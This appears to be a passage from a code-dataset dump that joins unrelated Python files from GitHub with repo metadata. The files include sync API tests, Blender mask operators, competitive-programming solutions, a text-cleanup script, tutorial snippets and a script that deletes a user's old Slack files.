simplejson.loads(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_bulk_update(self):\n \"\"\"Exercise bulk collection update\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n auth_header = self.build_auth_header()\n storage_url = '/sync/1.0/%s/storage/%s' % (p.user_name, c.name)\n\n self.build_wbo_parents_and_predecessors()\n\n bulk_data = [\n { 'id': '' },\n { 'id': 'foo/bar', 'sortindex': 'abcd' },\n { 'id': 'a-1000', 'sortindex':-1000000000 },\n { 'id': 'a-1001', 'sortindex': 1000000000 },\n { 'id': 'a-1002', 'parentid': 'notfound' },\n { 'id': 'a-1003', 'predecessorid': 'notfound' },\n { 'id': 'a-1004', 'payload': 'invalid' },\n ]\n bulk_data.extend(self.wbo_values)\n\n self.log.debug(\"DATA %s\" % simplejson.dumps(bulk_data))\n\n resp = self.app.post(\n storage_url, headers=auth_header, \n params=simplejson.dumps(bulk_data)\n )\n self.assertEqual('200 OK', resp.status)\n result_data = simplejson.loads(resp.body)\n\n self.log.debug(\"RESULT %s\" % resp.body)\n\n self.assert_(WBO.get_time_now() >= float(result_data['modified']))\n\n expected_ids = [ w['id'] for w in self.wbo_values ]\n self.assertEqual(expected_ids, result_data['success'])\n \n expected_failures = {\n \"\": [\"invalid id\"], \n \"a-1004\": [\"payload needs to be json-encoded\"], \n \"a-1003\": [\"invalid predecessorid\"], \n \"a-1002\": [\"invalid parentid\"], \n \"a-1001\": [\"invalid sortindex\"], \n \"a-1000\": [\"invalid sortindex\"], \n \"foo/bar\": [\"invalid id\", \"invalid sortindex\"]\n }\n self.assertEqual(expected_failures, result_data['failed'])\n\n stored_ids = [ w.wbo_id for w in WBO.all() ]\n for wbo_id in expected_ids:\n self.assert_(wbo_id in stored_ids)\n\n def test_alternate_output_formats(self):\n \"\"\"Exercise alternate output formats\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n self.build_wbo_set()\n wbos = [ w for w in WBO.all() ]\n wbos.sort(lambda b,a: cmp(a.sortindex, b.sortindex))\n expected_ids = [ w.wbo_id for w in wbos ]\n\n url = '/sync/1.0/%s/storage/%s?full=1' % (p.user_name, c.name)\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n result_ids = [ x['id'] for x in result_data ]\n self.assertEqual(expected_ids, result_ids)\n\n url = '/sync/1.0/%s/storage/%s?full=1' % (p.user_name, c.name)\n headers = { 'Accept': 'application/newlines' }\n headers.update(ah)\n resp = self.app.get(url, headers=headers)\n lines = resp.body.splitlines()\n for line in lines:\n data = simplejson.loads(line)\n self.assert_(data['id'] in expected_ids)\n\n if (False):\n url = '/sync/1.0/%s/storage/%s?full=1' % (p.user_name, c.name)\n headers = { 'Accept': 'application/whoisi' }\n headers.update(ah)\n resp = self.app.get(url, headers=headers)\n lines = \"\\n\".split(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"RESULT %s\" % resp.body)\n self.log.debug(\"RESULT2 %s\" % simplejson.dumps(lines))\n self.log.debug(\"LINES %s\" % len(lines))\n\n def test_cascading_profile_delete(self):\n \"\"\"Ensure that profile deletion cascades down to collections and WBOs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n self.assert_(WBO.all().count() > 0)\n self.assert_(Collection.all().count() > 0)\n self.assert_(Profile.all().count() > 0)\n\n p.delete()\n\n self.assertEquals(0, WBO.all().count())\n self.assertEquals(0, Collection.all().count())\n self.assertEquals(0, Profile.all().count())\n\n def test_cascading_collection_delete(self):\n \"\"\"Ensure that collection deletion cascades down to WBOs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n count_all = WBO.all().count()\n collections = [c for c in Collection.all().ancestor(p)]\n for c in collections:\n c_count = len([x for x in c.retrieve()])\n c.delete()\n count_all -= c_count\n self.assertEqual(count_all, WBO.all().count())\n\n self.assertEqual(0, WBO.all().count())\n\n def test_header_if_unmodified_since(self):\n \"\"\"Ensure that X-If-Unmodified-Since header is honored in PUT / POST / DELETE\"\"\"\n self.fail(\"TODO\")\n\n def build_wbo_parents_and_predecessors(self):\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n id_sets = dict([\n (kind, set([ w[kind] for w in self.wbo_values ]))\n for kind in ('parentid', 'predecessorid')\n ])\n\n for kind, id_set in id_sets.items():\n for wbo_id in id_set:\n w = WBO(\n parent=c, collection=c,\n modified = WBO.get_time_now(), \n wbo_id = wbo_id, \n payload = simplejson.dumps({'random':'xxx'})\n )\n w.put()\n\n def build_wbo_set(self, num_wbos=15):\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n self.build_wbo_parents_and_predecessors()\n\n wbos = []\n for values in self.wbo_values:\n w = WBO(\n parent=c, collection=c,\n modified=WBO.get_time_now(), \n wbo_id = values['id'], \n parentid = values['parentid'],\n predecessorid = values['predecessorid'],\n sortindex = values['sortindex'], \n payload = values['payload']\n )\n w.put()\n wbos.append(w)\n time.sleep(0.1) # HACK: Delay to ensure modified stamps vary\n\n return wbos\n\n def put_random_wbo(self, url, auth_header):\n \"\"\"PUT a randomized WBO, given a base URL and auth header\"\"\"\n wbo_id = random.randint(0, 1000000)\n wbo_json = simplejson.dumps({\n 'sortindex': random.randint(0, 1000),\n 'payload': simplejson.dumps({\n 'random': ''.join(random.sample(string.letters, 16))\n })\n })\n return self.app.put(\n '%s/%s' % (url, wbo_id), \n headers=auth_header, \n params=wbo_json\n )\n\n def build_auth_header(self, user_name=None, passwd=None):\n \"\"\"Build an HTTP Basic Auth header from user name and password\"\"\"\n user_name = user_name or self.USER_NAME\n passwd = passwd or self.PASSWD\n return {\n 'Authorization': 'Basic %s' % base64.b64encode(\n '%s:%s' % (user_name, passwd)\n )\n }\n","repo_name":"lmorchard/firefox-sync-appengine","sub_path":"test/sync_api_tests.py","file_name":"sync_api_tests.py","file_ext":"py","file_size_in_byte":30101,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"52"} +{"seq_id":"12817122387","text":"import sys\n\ndef solution():\n global w, h, lands\n answer = 0\n v = [[0 for _ in range(w)] for _ in range(h)]\n\n for i in range(h):\n for j in range(w):\n if lands[i][j] != 0 and v[i][j] == 0:\n answer += 1\n stack = [(i, j)]\n v[i][j] = 1\n\n while stack:\n x, y = stack.pop()\n for k in range(8):\n new_x, new_y = x + dx[k], y + dy[k]\n if 0 <= new_x < h and 0 <= new_y < w:\n if v[new_x][new_y] == 0 and lands[new_x][new_y] != 0:\n stack.append((new_x, new_y))\n v[new_x][new_y] = 1\n\n print(answer)\n\n\ndx, dy = (-1, 1, 0, 0, -1, 1, -1, 1), (0, 0, -1 ,1, -1, -1, 1, 1)\nwhile True:\n w, h = map(int, sys.stdin.readline().strip().split(\" \"))\n if w == 0 and h == 0:\n break\n\n lands = []\n for i in range(h):\n lands.append(list(map(int, sys.stdin.readline().strip().split(\" \"))))\n\n solution()","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/DFS_BFS/백준_섬의_개수.py","file_name":"백준_섬의_개수.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73100218724","text":"import enum\nimport bpy\nfrom turbo_nerf.constants import (\n MASK_BOX_DIMS_ID,\n MASK_CYLINDER_HEIGHT_ID,\n MASK_CYLINDER_RADIUS_ID,\n MASK_FEATHER_ID,\n MASK_MODE_ID,\n MASK_OPACITY_ID,\n MASK_SPHERE_RADIUS_ID,\n MASK_TYPE_BOX,\n MASK_TYPE_CYLINDER,\n MASK_TYPE_ID,\n MASK_TYPE_SPHERE,\n OBJ_TYPE_ID,\n OBJ_TYPE_MASK_SHAPE,\n)\n\nfrom turbo_nerf.blender_utility.object_utility import add_cube, add_cylinder, add_empty, add_sphere, select_object\n\n# TODO: these should be in a different file\ndef lock_scale_with_drivers(obj):\n drivers = [fc.driver for fc in obj.driver_add('scale')]\n for driver in drivers:\n driver.expression = \"1.0\"\n \ndef lock_location_with_drivers(obj):\n drivers = [fc.driver for fc in obj.driver_add('location')]\n for driver in drivers:\n driver.expression = \"0.0\"\n\ndef lock_rotation_with_drivers(obj):\n drivers = [fc.driver for fc in obj.driver_add('rotation_euler')]\n for driver in drivers:\n driver.expression = \"0.0\"\n\n# Mask utils\n\ndef add_mask_specific_properties(mask_base, mask_type):\n if mask_type == MASK_TYPE_BOX:\n mask_base[MASK_BOX_DIMS_ID] = [2.0, 2.0, 2.0]\n props = mask_base.id_properties_ui(MASK_BOX_DIMS_ID)\n props.update(min=-1000.0, max=1000.0, soft_min=-100.0, soft_max=100.0, step=1, precision=3)\n\n elif mask_type == MASK_TYPE_CYLINDER:\n mask_base[MASK_CYLINDER_RADIUS_ID] = 1.0\n props = mask_base.id_properties_ui(MASK_CYLINDER_RADIUS_ID)\n props.update(min=0.0, max=1000.0, soft_min=0.0, soft_max=100.0, step=1, precision=3)\n\n mask_base[MASK_CYLINDER_HEIGHT_ID] = 2.0\n props = mask_base.id_properties_ui(MASK_CYLINDER_HEIGHT_ID)\n props.update(min=0.0, max=1000.0, soft_min=0.0, soft_max=100.0, step=1, precision=3)\n\n elif mask_type == MASK_TYPE_SPHERE:\n mask_base[MASK_SPHERE_RADIUS_ID] = 1.0\n props = mask_base.id_properties_ui(MASK_SPHERE_RADIUS_ID)\n props.update(min=0.0, max=1000.0, soft_min=0.0, soft_max=100.0, step=1, precision=3)\n else:\n raise ValueError(f\"Unknown mask type {mask_type}\")\n\ndef add_mask_box_drivers(mask_base, edge_obj, operator=\"+\"):\n drivers = [fc.driver for fc in edge_obj.driver_add('scale')]\n for idx, driver in enumerate(drivers):\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n var_d = driver.variables.new()\n var_d.name = \"dim\"\n var_d.targets[0].id = mask_base\n var_d.targets[0].data_path = f'[\"{MASK_BOX_DIMS_ID}\"][{idx}]'\n\n driver.expression = f\"max(0.0, (dim / 2.0) {operator} (0.5 * feather))\"\n\ndef add_mask_cylinder_drivers(mask_base, edge_obj, operator=\"+\"):\n [sx, sy, sz] = [fc.driver for fc in edge_obj.driver_add('scale')]\n for driver in [sx, sy, sz]:\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n for driver in [sx, sy]:\n var_r = driver.variables.new()\n var_r.name = \"r\"\n var_r.targets[0].id = mask_base\n var_r.targets[0].data_path = f'[\"{MASK_CYLINDER_RADIUS_ID}\"]'\n\n sx.expression = sy.expression = f\"max(0.0, r {operator} 0.5 * feather)\"\n \n var_h = sz.variables.new()\n var_h.name = \"h\"\n var_h.targets[0].id = mask_base\n var_h.targets[0].data_path = f'[\"{MASK_CYLINDER_HEIGHT_ID}\"]'\n\n sz.expression = f\"max(0.0, (h / 2.0) {operator} 0.5 * feather)\"\n\ndef add_mask_sphere_drivers(mask_base, edge_obj, operator=\"+\"):\n drivers = [fc.driver for fc in edge_obj.driver_add('scale')]\n for driver in drivers:\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n var_r = driver.variables.new()\n var_r.name = \"r\"\n var_r.targets[0].id = mask_base\n var_r.targets[0].data_path = f'[\"{MASK_SPHERE_RADIUS_ID}\"]'\n\n driver.expression = f\"max(0.0, r {operator} 0.5 * feather)\"\n\n# unused - for nondescript shapes that use scales for feathering instead of individual parameters\ndef add_mask_edge_scale_drivers(mask_base, visual_obj, operator=\"+\"):\n [sx, sy, sz] = [fc.driver for fc in visual_obj.driver_add('scale')]\n for driver in [sx, sy, sz]:\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n var_s = driver.variables.new()\n var_s.name = \"base_scale\"\n var_s.targets[0].id = mask_base\n var_s.targets[0].data_path = 'scale'\n \n sx.expression = f\"1.0 {operator} feather / base_scale[0]\"\n sy.expression = f\"1.0 {operator} feather / base_scale[1]\"\n sz.expression = f\"1.0 {operator} feather / base_scale[2]\"\n\nMASK_TYPE_TO_PRIMITIVE_CONSTRUCTOR = {\n MASK_TYPE_BOX: add_cube,\n MASK_TYPE_CYLINDER: add_cylinder,\n MASK_TYPE_SPHERE: add_sphere,\n}\n\nMASK_TYPE_TO_DRIVER_ADDER = {\n MASK_TYPE_BOX: add_mask_box_drivers,\n MASK_TYPE_CYLINDER: add_mask_cylinder_drivers,\n MASK_TYPE_SPHERE: add_mask_sphere_drivers,\n}\n\nMASK_TYPE_TO_NICE_NAME = {\n MASK_TYPE_BOX: \"Box\",\n MASK_TYPE_CYLINDER: \"Cylinder\",\n MASK_TYPE_SPHERE: \"Sphere\",\n}\n\ndef add_mask_feathering_visualization(mask_base, mask_type):\n if mask_type not in MASK_TYPE_TO_PRIMITIVE_CONSTRUCTOR:\n raise ValueError(f\"Unknown mask type {mask_type}\")\n \n constructor = MASK_TYPE_TO_PRIMITIVE_CONSTRUCTOR[mask_type]\n driver_adder = MASK_TYPE_TO_DRIVER_ADDER[mask_type]\n nice_name = MASK_TYPE_TO_NICE_NAME[mask_type]\n\n outer_obj = constructor(name=f\"{nice_name} Mask Outer Boundary\")\n outer_obj.parent = mask_base\n outer_obj.display_type = \"WIRE\"\n driver_adder(mask_base, outer_obj, operator=\"+\")\n lock_location_with_drivers(outer_obj)\n lock_rotation_with_drivers(outer_obj)\n\n \n inner_obj = constructor(name=f\"{nice_name} Mask Inner Boundary\")\n inner_obj.parent = mask_base\n inner_obj.display_type = \"WIRE\"\n driver_adder(mask_base, inner_obj, operator=\"-\")\n lock_location_with_drivers(inner_obj)\n lock_rotation_with_drivers(inner_obj)\n\n\nclass BlenderNeRFAddMaskShapeOperator(bpy.types.Operator):\n bl_idname = \"blender_nerf.add_mask_shape\"\n bl_label = \"Add Mask Shape\"\n bl_description = \"Add a mask shape\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n mask_type = context.scene.nerf_render_panel_settings.mask_shape\n mask_base = add_empty(f\"{MASK_TYPE_TO_NICE_NAME[mask_type]} Mask Object\")\n \n mask_base[OBJ_TYPE_ID] = OBJ_TYPE_MASK_SHAPE\n mask_base[MASK_TYPE_ID] = mask_type\n mask_base[MASK_MODE_ID] = context.scene.nerf_render_panel_settings.mask_mode\n mask_base[MASK_FEATHER_ID] = 0.0\n mask_base[MASK_OPACITY_ID] = 1.0\n\n add_mask_specific_properties(mask_base, mask_type)\n \n props = mask_base.id_properties_ui(MASK_FEATHER_ID)\n props.update(min=0.0, max=128.0)\n\n add_mask_feathering_visualization(mask_base, mask_type)\n lock_scale_with_drivers(mask_base)\n\n select_object(mask_base)\n\n return {\"FINISHED\"}\n","repo_name":"JamesPerlman/TurboNeRF-Blender","sub_path":"panels/render_panel_operators/mask_shape_operators.py","file_name":"mask_shape_operators.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"52"} +{"seq_id":"33399549791","text":"import re\nfrom enum import Enum\nfrom utils import StringBuilder\n\nclass Locale(Enum):\n\tNorwegian = 1\n\tUS = 2\n\nclass NumberLocalization:\n\t\"\"\"\n\tLocale-specific formatting of numbers\n\t\"\"\"\n\tdef __init__(self, original: Locale, destination: Locale) -> None:\n\t\t\"\"\"Construct a NumberLocalization instance\n\t\toriginal -- The original locale\n\t\tdestination -- The destination locale\n\t\t\"\"\"\n\t\tself.original = original\n\t\tself.destination = destination\n\n\t\tif self.original == Locale.US:\n\t\t\tself.original_thousand_separator = \",\"\n\t\t\tself.original_decimal_separator = \".\"\n\t\t\tself.pattern = \"\\d+(,\\d{3})*(.\\d+)?\"\n\t\telse:\n\t\t\tself.original_thousand_separator = \".\"\n\t\t\tself.original_decimal_separator = \",\"\t\t\t\n\t\t\tself.pattern = \"\\d+(.\\d{3})*(,\\d+)?\"\n\n\t\tif self.destination == Locale.US:\n\t\t\tself.destination_thousand_separator = \",\"\n\t\t\tself.destination_decimal_separator = \".\"\n\t\telse:\n\t\t\tself.destination_thousand_separator = \".\"\n\t\t\tself.destination_decimal_separator = \",\"\n\t\n\tdef findAllNumbers(self, text: str):\n\t\tfor i in re.finditer(self.pattern, text, re.S):\n\t\t\tprint(i)\n\n\tdef convert(self, text) -> str:\n\t\t\"\"\"\n\t\tFind and convert all the numbers\n\t\t\"\"\"\n\n\t\tsb = StringBuilder()\n\t\tcurr = 0\n\n\t\tfor i in re.finditer(self.pattern, text, re.S):\n\t\t\t# Append the previous text\n\t\t\tsb.append(text[curr: i.start()])\n\n\t\t\t# Formatting\n\t\t\ttemp_old = i.group(0)\n\t\t\tdecimal_separator_pos = temp_old.find(self.original_decimal_separator)\n\t\t\t\n\t\t\tif decimal_separator_pos >= 0:\n\t\t\t\ttemp_new = temp_old[0:decimal_separator_pos].replace(self.original_thousand_separator, self.destination_thousand_separator) + \\\n\t\t\t\t\tself.destination_decimal_separator + temp_old[decimal_separator_pos + 1:]\n\t\t\telse:\n\t\t\t\ttemp_new = temp_old.replace(self.original_thousand_separator, self.destination_thousand_separator)\n\n\t\t\tsb.append(temp_new) # Append the formatted number\n\t\t\tcurr = i.end() # Update curr\n\n\t\t# Append the left over text\n\t\tsb.append(text[curr:])\n\t\t\n\t\treturn sb\n\nclass MiniGrammarly:\n\tdata = [\t\t\n\t\t#(\"\\n\\n\", \"\\n\"), # Double newlines\n\t\t(\"[‘’“”❮❯‹›]|«\\s*|\\s*»\",\"\\\"\"), # Quotation Marks: Left+Right Single, L+R Double, L+R Pointing Double Angle, Heavy L+R Pointing Angle Quotation Mark Ornament, Single Left+Right Pointing Angle\n\t\t(\"(?i)covid\",\"COVID\"), # covid, Covid, coVID \n\t\t(\"(?i)v\\wc(\\s*|\\W)xin\",\"vaccine\"), # Vắc-xin, Vac-xin, vac xin, vắc xin, vacxin, vac xin, vắcxin\t\n\t\t(\"\\s*,\\s*(?!\\d)\", \", \"), # Hello , world. Hello , world. Hello ,world. Hello, world. Hello,world. 10,000\n\t\t(\"\\s{2,}\", \" \"), # Double spaces. Ex. Hello world.\n\t\t]\n\t\n\tdef check(self, instr: str):\n\t\t\"\"\"\n\t\tScan and correct grammar errors\n\t\t\n\t\tParams:\n\t\tinstr: str\n\t\t\tString to check\n\t\t\"\"\"\n\t\t# Dictionary\n\t\tfor a, b in self.data:\n\t\t\tinstr = re.sub(a, b, instr)\n\t\t\n\t\t# Number Localization\n\t\tnlc = NumberLocalization(Locale.Norwegian, Locale.US)\n\t\treturn nlc.convert(instr).__str__()\n\ndef test():\n\tin_str = \"Today, 10.000.999,22 nguoi chet vi covid-19 , du da chich vac xin 8.000,3 lieu\"\n\tf = MiniGrammarly()\n\tprint(f.check(in_str))\n\ndef test2():\n\tin_str = \"Today, 10.000.999,22 nguoi chet vi covid-19 , du da chich vac xin 8.000,3 lieu\"\n\tf = NumberLocalization(Locale.Norwegian, Locale.US)\n\tout_str = f.convert(in_str)\n\tprint(in_str)\n\tprint(out_str)\n\ndef main():\n\tresult = \"\"\n\tf = open(\"raw_input.txt\")\n\t\n\tgrammarly = MiniGrammarly()\n\tfor line in f:\n\t\tresult += grammarly.check(line)\n\t\t# print(doc_format.format(line))\n\n\tprint(result)\n\n\t# Write to file\n\tfw = open(\"formatted_input.txt\", \"w\")\n\tfw.write(result)\n\tfw.close()\n\t\nif __name__ == \"__main__\":\n\tmain()\n\t# test()\n\t# test2()\n\t# testStringBuilder()\n","repo_name":"NLTN/wordpress-txt2wxr","sub_path":"MiniGrammarly.py","file_name":"MiniGrammarly.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41931274661","text":"from setuptools import setup, find_packages\n\nconfig = {\n 'description': \"A suite of tools for portable automated scientific protocols.\",\n 'author': \"OpenTrons\",\n 'author_email': 'info@opentrons.com',\n 'url': 'http://opentrons.com',\n 'version': '1.0',\n 'install_requires': ['pyyaml', 'pyserial'],\n 'packages': find_packages(exclude=[\"tests\"]),\n 'package_data': {\n \"opentrons_sdk\": [\n \"config/containers/**/*.yml\",\n \"config/containers/legacy_containers.json\",\n \"compilers/data/*\",\n \"compilers/templates/*\"\n ]\n },\n 'scripts': [\n 'bin/opentrons_sdk-compile'\n ],\n 'name': 'opentrons_sdk',\n 'test_suite': 'nose.collector',\n 'zip_safe': False\n}\n\nsetup(**config)\n","repo_name":"Yuffster/opentrons_sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"20029326937","text":"'''\nTuple\nTuples are used to store multiple items in a single variable.\n\nTuple is one of 4 built-in data types in Python used to store collections of data, the other 3 are List, \nSet, and Dictionary, all with different qualities and usage.\n\nA tuple is a collection which is ordered and unchangeable.\n\nTuples are written with round brackets.\n'''\n\n# Create a Tuple:\nthistuple = (\"apple\", \"banana\", \"cherry\")\nprint(thistuple)\n\n# Tuples allow duplicate values:\nthistuple = (\"apple\", \"banana\", \"cherry\", \"apple\", \"cherry\")\nprint(thistuple)\n\n# Print the number of items in the tuple:\nthistuple = (\"apple\", \"banana\", \"cherry\")\nprint(len(thistuple))\n\n# One item tuple, remember the comma:\nthistuple = (\"apple\",)\nprint(type(thistuple))\n\n# NOT a tuple\nthistuple = (\"apple\")\nprint(type(thistuple))\n\n# String, int and boolean data types:\ntuple1 = (\"apple\", \"banana\", \"cherry\")\ntuple2 = (1, 5, 7, 9, 3)\ntuple3 = (True, False, False)\n\n# A tuple with strings, integers and boolean values:\ntuple1 = (\"abc\", 34, True, 40, \"male\")\ntype()\n\n# What is the data type of a tuple?\nmytuple = (\"apple\", \"banana\", \"cherry\")\nprint(type(mytuple))\n\n# Using the tuple() method to make a tuple:\nthistuple = tuple((\"apple\", \"banana\", \"cherry\")) # note the double round-brackets\nprint(thistuple)","repo_name":"bogaraviteja/python-basics","sub_path":"python/03_data_structures/02_tuples/01_tuples.py","file_name":"01_tuples.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4298314545","text":"# PENCERELERİ YENİDEN BOYUTLANDIRMA\nimport cv2\n\ncv2.namedWindow(\"klon\") # mouse ile boyutlandırmamı<ı sağlar\n\nimg = cv2.imread(\"klon.jpg\")\n\nimg = cv2.resize(img,(640,480)) # burada ise daha detaylı ve istediğimiz boyutlandırabiliriz\n\n\ncv2.imshow(\"klon\",img)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n","repo_name":"Yusufygc/GoruntuIsleme","sub_path":"klasor6/calısma2.py","file_name":"calısma2.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13097694595","text":"from sys import stdin, setrecursionlimit\n\nsetrecursionlimit(100_100)\n\n\ndef solution(N, vals, queries):\n LEAF_SIZE = 2**len(bin(N-1)[2:])\n tree = [None]*2*LEAF_SIZE\n\n def fill_tree(left, right, tid):\n if left == right:\n if left <= N:\n tree[tid] = left\n return tree[tid]\n m = (left + right)//2\n idxs = (fill_tree(left, m, tid * 2), fill_tree(m + 1, right, tid * 2 + 1))\n tree[tid] = sorted(idxs, key=lambda x: vals[x-1] if x is not None else float('inf'))[0]\n return tree[tid]\n fill_tree(1, LEAF_SIZE, 1)\n\n def update_tree(left, right, tid, idx):\n if left == right:\n return tree[tid]\n\n m = (left + right)//2\n if idx <= m:\n a = update_tree(left, m, tid*2, idx)\n b = tree[tid*2+1]\n else:\n a = tree[tid*2]\n b = update_tree(m+1, right, tid*2+1, idx)\n tree[tid] = sorted((a, b), key=lambda x: vals[x-1] if x is not None else float('inf'))[0]\n return tree[tid]\n\n def query_min(left, right, start, end, tid):\n if start <= left and right <= end:\n return tree[tid]\n if end < left or right < start:\n return None\n m = (left + right)//2\n idxs = query_min(left, m, start, end, tid * 2), query_min(m + 1, right, start, end, tid * 2 + 1)\n return sorted(idxs, key=lambda x: vals[x-1] if x is not None else float('inf'))[0]\n\n answers = []\n for op, a, b in queries:\n if op == 1:\n vals[a-1] = b\n update_tree(1, LEAF_SIZE, 1, a)\n elif op == 2:\n answers.append(query_min(1, LEAF_SIZE, a, b, 1))\n return answers\n\n\nlexer = lambda: [int(c) for c in stdin.readline().strip().split(' ')]\nN = int(stdin.readline())\nvals = lexer()\nM = int(stdin.readline())\nqueries = [lexer() for _ in range(M)]\n\nfor a in solution(N, vals, queries):\n print(a)\n","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/세그먼트 트리/14428 수열과 쿼리 16.py","file_name":"14428 수열과 쿼리 16.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37882951091","text":"\"\"\" Access Specifiers\nSpecify the access level of an attribute/method.\nPublic, Protected, Private.\n\"\"\"\n# Protected are accessible in the same class and all of its child-classes\n# use underscore (_) as a prefix.\n\nclass Vehicle:\n\n def __init__(self, engine):\n # protected memebers\n self._engine = engine\n\nclass Car(Vehicle):\n def __init__(self, engine, model, price):\n super().__init__(engine)\n # protected memebers\n self._model = model\n self._price = price\n\n def print_info(self):\n # protected member is accessible in child class\n print(f\"Engine: {self._engine} \")\n print(f\"Model : {self._model} \")\n print(f\"Price : {self._price} L\")\n\n\npar_obj = Vehicle('Desel')\nobj = Car('electric', 'Nexon', 15)\n\nprint(obj.print_info())\n","repo_name":"Nimesh-Nagar/iot","sub_path":"2.programming_technology/Python_Programming/Practice/oops/p12_protected.py","file_name":"p12_protected.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39966721927","text":"# Inspired by https://github.com/kfei/slack-cleaner\n\nimport datetime\nimport re\nimport sys\nimport time\nfrom slacker import Slacker\n\ndef prev_ts(days):\n date = datetime.datetime.today()\n delta = datetime.timedelta(days=days)\n return (date - delta).timestamp()\n\ndef remove_files(slack, ts, types):\n # Deletes everything up to the provided ts\n page = 1\n has_more = True\n counter = 0\n while has_more:\n res = slack.files.list(ts_to=ts, types=types).body\n\n if not res['ok']:\n print('SLACK MAD')\n sys.exit(1)\n\n files = res['files']\n current_page = res['paging']['page']\n total_pages = res['paging']['pages']\n has_more = current_page < total_pages\n page = current_page + 1\n\n for f in files:\n # Delete user file\n counter += delete_file(slack, f)\n return counter\n\ndef delete_file(slack, f):\n # Actually perform the task\n try:\n # No response is a good response\n slack.files.delete(f['id'])\n return 1\n except Exception as error:\n print(\"Can't delete \", f['id'])\n return 0\n\ndef main():\n # Use: python main.py token days\n # Example: python main.py xoxojfiwjfoiwejfejwio 30\n # Get token at https://api.slack.com/custom-integrations/legacy-tokens\n # Everything up to x days ago will be deleted\n [_, token, days, types] = sys.argv\n api = Slacker(token)\n deleted = remove_files (api, prev_ts(int(days)), types)\n return \"Deleted \" + str(deleted) + \" files\"\n\nprint(main())\n","repo_name":"AHAAAAAAA/slacko-deleto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31018907769","text":"\"\"\"Module for obs command group.\"\"\"\r\nimport logging\r\nimport re\r\nfrom collections import namedtuple\r\nfrom contextlib import asynccontextmanager\r\nfrom typing import Optional, Union\r\nimport urllib.parse\r\n\r\nfrom dronefly.core.constants import RANK_KEYWORDS, RANK_LEVELS\r\nfrom dronefly.core.formatters.constants import WWW_BASE_URL\r\nfrom dronefly.core.formatters.generic import LifeListFormatter\r\nfrom dronefly.core.parsers.url import PAT_OBS_LINK, PAT_TAXON_LINK\r\nfrom dronefly.core.query.query import Query\r\nfrom dronefly.core.utils import obs_url_from_v1\r\nfrom dronefly.discord.embeds import make_embed\r\nfrom pyinaturalist.models import Observation\r\nfrom redbot.core import checks, commands\r\nfrom redbot.core.commands import BadArgument\r\nfrom redbot.core.utils.menus import menu, DEFAULT_CONTROLS\r\n\r\nfrom ..common import grouper\r\nfrom ..converters.base import NaturalQueryConverter\r\nfrom ..converters.reply import EmptyArgument, TaxonReplyConverter\r\nfrom ..embeds.common import apologize, add_reactions_with_cancel\r\nfrom ..embeds.inat import INatEmbed, INatEmbeds\r\nfrom ..menus.inat import BaseMenu, LifeListSource\r\nfrom ..interfaces import MixinMeta\r\nfrom ..obs import get_formatted_user_counts, maybe_match_obs\r\nfrom ..taxa import TAXON_COUNTS_HEADER\r\nfrom ..utils import get_home, use_client\r\n\r\nObsResult = namedtuple(\"Singleobs\", \"obs url preview\")\r\nlogger = logging.getLogger(\"red.dronefly.\" + __name__)\r\n\r\n\r\nclass CommandsObs(INatEmbeds, MixinMeta):\r\n \"\"\"Mixin providing obs command group.\"\"\"\r\n\r\n @asynccontextmanager\r\n async def _single_obs(self, ctx, query):\r\n \"\"\"Return a single observation, its URL, and whether to preview it.\r\n\r\n Image preview is only desired if it wasn't already auto-previewed\r\n by Discord itself (i.e. the user pasted a URL, and did not 